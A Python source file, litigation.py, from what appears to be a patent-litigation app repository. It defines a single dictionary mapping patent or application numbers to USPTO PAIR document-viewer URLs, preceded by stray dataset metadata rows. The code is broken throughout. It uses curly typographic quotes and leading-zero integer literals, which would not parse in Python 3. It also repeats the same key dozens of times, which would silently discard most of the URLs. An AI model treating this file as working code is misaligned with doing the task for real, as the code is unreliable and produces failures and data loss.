| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eca9b5b33d503a12351bf5c59458c22895b7ec16
| 27,864
|
py
|
Python
|
litigation.py
|
JessieSalas/WatsonApp
|
5837b9c091419d65c67c0556b14bff55ecd9ccc5
|
[
"MIT"
] | null | null | null |
litigation.py
|
JessieSalas/WatsonApp
|
5837b9c091419d65c67c0556b14bff55ecd9ccc5
|
[
"MIT"
] | null | null | null |
litigation.py
|
JessieSalas/WatsonApp
|
5837b9c091419d65c67c0556b14bff55ecd9ccc5
|
[
"MIT"
] | 1
|
2019-02-02T10:41:15.000Z
|
2019-02-02T10:41:15.000Z
|
litigation_dict={
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HU011X63PXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU2HPXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU31PXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU39PXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU3HPXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU3QPXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU41PXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU49PXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU4IPXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HLQSFU4RPXXIFW4&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GSC19LA7PPOPPY5&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GLAZVS1BPPOPPY5&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GLB0W3AZPPOPPY5&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKSOXRXBPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKSOXS17PPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKSOXS1PPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEDPPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEEGPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEF5PPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEJ5PPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEJLPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYEKRPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYELPPPOPPY2&lang=DINO”,
0219427:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GKPUYENHPPOPPY2&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FZ5K2KJRPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FYRJ5AUKPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FR5MPDSJPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FR5MPDTUPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FOSR13LBPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FOSR13MNPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FOSR13O1PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FQAYKOAKPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FMVVYCXTPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FMKMLTFXPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6AKPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6C1PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6CDPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6CYPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6DAPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FL88Z6DMPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FE30UU03PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FJJX78X4PPOPPY2&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92N03PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92N59PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92N5LPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92N66PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NBAPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NC2PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NCPPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NGCPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NY6PPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NYTPPOPPY5&lang=DINO”,
0219788:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=FDN92NZ5PPOPPY5&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HMB8U5MOPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HM16TXJ9PXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HL9QTDVUPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HL9QTDWOPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HL9QTDWVPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HKMJV36APXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HKMJV36IPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HKMJV36QPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFUGPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFV0PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFV8PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFVGPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFVPPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFVXPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFWFPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFWNPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFWVPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFX2PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFXAPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFXIPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFXQPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFYBPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFYJPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFZMPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HJLIYFZUPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HD7PXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HE9PXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HEHPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HEOPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HEWPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HF4PXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HFFPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HFOPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHM91HFVPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HG9WECVOPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HG9WECWMPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HG9WECXMPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF2YQ96BPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF2YQ971PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF30227TPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF302282PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF30228ZPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF49VFTIPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9DOPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9F9PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9FKPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9FSPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9GKPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HAN0CEIDPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HC84J9GKPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HAN0CEIUPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HAN0CEJ2PXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HAN0CEJGPXXIFW3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDGQPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDHRPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDHZPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDIFPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDIOPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDIOPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDIXPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDK9PXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA9RDDNVPXXIFW4&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GTNBC5KAPPOPPY2&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GILSPO9IPPOPPY5&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GGKRER3APPOPPY3&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GEH3J3SHPPOPPY5&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=G8HPF9K5PPOPPY2&lang=DINO”,
0003665:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GAL2TICFPPOPPY5&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HAN88OC2PXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA2KNSKMPXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA2KNSNRPXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HA2KNSO0PXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H720OL1JPXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H720OL31PXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H720OL9FPXXIFW4&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H2W42CF0PXXIFW3&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H2W42CFPPXXIFW3&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GLNRKYA4PPOPPY5&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GD0CZPTZPPOPPY5&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GCI3NG3WPPOPPY2&lang=DINO”,
0069045:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GCI3NGI6PPOPPY2&lang=DINO”,
0037375:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GJP6FDV8PPOPPY5&lang=DINO”,
0037375:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GIXIF4RJPPOPPY2&lang=DINO”,
0037375:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GIXIF4TEPPOPPY2&lang=DINO”,
0037375:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GF6QXDTWPPOPPY5&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=I07GEW50PXXIFW4&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZRKAGFBPXXIFW4&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZMK2WY9PXXIFW3&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZMK2WY9PXXIFW3&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWWEGFEPPXXIFW4&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HVPGF5XAPXXIFW1&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HFX87MGDPXXIFW3&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HFX87MGLPXXIFW3&lang=DINO”,
8854927:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HVJO9YEPPXXIFW3&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZXDEOIGPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZAC0H2GPXXIFW3&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HZAC0H3HPXXIFW3&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWW5R0GZPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWW5R0HGPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWW5R0HQPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWL7PVTPPXXIFW3&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HWL7PVVLPXXIFW3&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HUO4R3XDPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HSX5S8XBPXXIFW4&lang=DINO”,
8845925:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HABO4DG0PXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HXIATSA0PXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HXIATSAIPXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HV7PI60ZPXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HUJQGKSLPXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HT8PSQPHPXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HT2A952MPXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HT2A958PPXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HPCOS391PXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HOJCWSTCPXXIFW3&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HPCOC4WZPXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HPPSL6ADPXXIFW4&lang=DINO”,
8744804:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HOJCWSU1PXXIFW3&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HUDEQC5DPXXIFW4&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTBHPINUPXXIFW4&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTBHPIOQPXXIFW4&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTBHPIPKPXXIFW4&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTHQLNM1PXXIFW3&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTHQLNLOPXXIFW3&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HTR5XEB2PXXIFW4&lang=DINO”,
8725842:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HOG526YWPXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HHB8AFZSPXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HGZ9K36OPXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HG7Z5D10PXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HEIZ5UCKPXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HE5R3NW9PXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HDEIO4BJPXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HDEIO4C0PXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HCHYWBDKPXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HCHYWBE2PXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HCHYWBCDPXXIFW3&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H6TFT54JPXXIFW4&lang=DINO”,
8467270:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GZ7754LUPXXIFW4&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HF14VWVJPXXIFW4&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HE1P5WA8PXXIFW3&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H6GQTQCCPXXIFW3&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H2T77II0PXXIFW4&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H1Y1ODAGPXXIFW3&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H1Y1ODE1PXXIFW3&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GY5RXG4YPXXIFW4&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GWHY2QQSPXXIFW4&lang=DINO”,
8279716:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GU8OCDWLPPOPPY2&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H4T5LQOHPXXIFW4&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H490KSJ5PXXIFW4&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H401XUKWPXXIFW3&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3YB6FJGPXXIFW4&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3YGVZEHPXXIFW3&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3HLV38CPXXIFW3&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H0DU8YUTPXXIFW4&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GJ5QZBL6PPOPPY5&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GGP7MWD5PPOPPY2&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GFS8GS25PPOPPY5&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GER9TXVPPPOPPY5&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GER9U8BQPPOPPY5&lang=DINO”,
8235586:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GF1H0O0EPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GU9DZN6ZPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GRXHKBC9PPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GRXHKBDCPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GRXHKBDYPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GRGTCOH5PPOPPY2&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GRJ8JJ3BPPOPPY1&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GR6KOVTAPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GJOJWB8OPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GJOJWBEBPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GF1DE7TCPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GB3QSZCRPPOPPY5&lang=DINO”,
8059491:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GAPHRL28PPOPPY2&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=E5RBSEY8PP1GUI4&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=E1UYF44GPP2GUI1&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=DVGJ582RPPOPPY2&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=DVGJ583WPPOPPY2&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=DVGJ585JPPOPPY2&lang=DINO”,
6873575:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=DVGJ58AFPPOPPY2&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=HER43NQOPXXIFW4&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H77IZGY6PXXIFW4&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H77IZGZ0PXXIFW4&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3RLP36UPXXIFW4&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3RLP38QPXXIFW4&lang=DINO”,
0159894:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=H3DEESG5PXXIFW4&lang=DINO”,
0172577:”http://portal.uspto.gov/pair/view/BrowsePdfServlet?objectId=GHI24DGSPPOPPY5&lang=DINO”,
